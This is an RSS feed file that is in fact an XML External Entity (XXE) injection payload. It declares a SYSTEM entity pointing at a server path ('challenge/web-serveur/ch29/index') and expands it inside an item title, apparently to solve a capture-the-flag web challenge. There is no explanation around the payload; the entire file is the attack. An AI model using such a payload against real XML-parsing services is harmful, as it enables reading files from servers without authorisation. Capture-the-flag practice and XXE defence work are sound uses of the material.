<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE rss [
	<!ENTITY xxe1 SYSTEM "data:///challenge/web-serveur/ch29/index," >
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>The Blog</title>
    <link>http://example.com/</link>
    <description>A blog about things</description>
    <item>
        <title> test &xxe1; test </title>
        <link>http://example.com</link>
        <description>a post</description>
		<guid>http://example.com</guid>
    </item>
</channel>
</rss>